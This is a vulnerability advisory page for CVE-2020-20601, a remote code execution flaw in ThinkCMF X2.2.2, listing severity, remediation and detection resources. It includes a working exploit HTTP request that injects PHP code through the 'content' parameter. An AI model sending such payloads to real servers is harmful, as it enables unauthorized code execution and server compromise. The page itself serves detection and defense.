🔙 목록으로 돌아가기

CVE-2020-20601: ThinkCMF X2.2.2 - Remote Code Execution

TitleThinkCMF X2.2.2 - Remote Code Execution
Authorpikpikcu
SeverityCritical
ImpactUnauthenticated attackers can execute arbitrary PHP code on ThinkCMF servers, leading to complete server compromise and access to all website data.
RemediationUpgrade to ThinkCMF version X2.2.3 or later.
CVSS Score9.8
EPSS Score0.48111
CVE IDCVE-2020-20601
CWE IDCWE-94
Tags cve cve2020 thinkcmf rce vuln vkev

🔍 Vulnerability Description

ThinkCMF X2.2.2 and below contain a remote code execution caused by processing crafted packets, letting attackers execute arbitrary code remotely, exploit requires sending malicious packets.

🌐 HTTP Request

GET /index.php?g=g&m=Door&a=index&content=<?php%20echo%20md5('ThinkCMF'); HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.1.2 Safari/605.1.15
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2020/CVE-2020-20601.yaml

🦈 Packet Capture: ⬇️ Download cve-2020-20601.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A